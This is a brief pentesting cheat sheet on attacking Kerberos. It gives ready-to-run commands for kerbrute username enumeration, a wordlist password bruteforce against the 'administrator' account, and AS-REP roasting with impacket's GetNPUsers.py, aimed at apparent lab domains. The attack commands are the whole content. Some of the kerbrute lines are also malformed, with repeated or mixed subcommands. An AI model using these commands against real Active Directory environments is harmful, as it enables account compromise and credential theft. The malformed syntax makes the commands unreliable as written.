Skip to content

88 - Pentesting kerberos

kerbrute - users enumeration

LIST_1='/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt'
LIST_2='/usr/share/wordlists/seclists/Usernames/Names/names.txt'
DOMAIN='spookysec.local'

/opt/windows/kerbrute userenum userenum --dc $DOMAIN -d $DOMAIN $LIST_1

kerbrute - users bruteforce

USER='administrator'
PASS='/usr/share/wordlists/rockyou.txt'
DOMAIN='spookysec.local'

/opt/windows/kerbrute userenum bruteuser --dc $DOMAIN -d $DOMAIN $PASS $USER -v

This attack looks for users without Kerberos pre-authentication required attribute.

python3 /opt/tools/impacket/examples/GetNPUsers.py 'VULNNET-RST/' -usersfile users.txt -no-pass -dc-ip $IP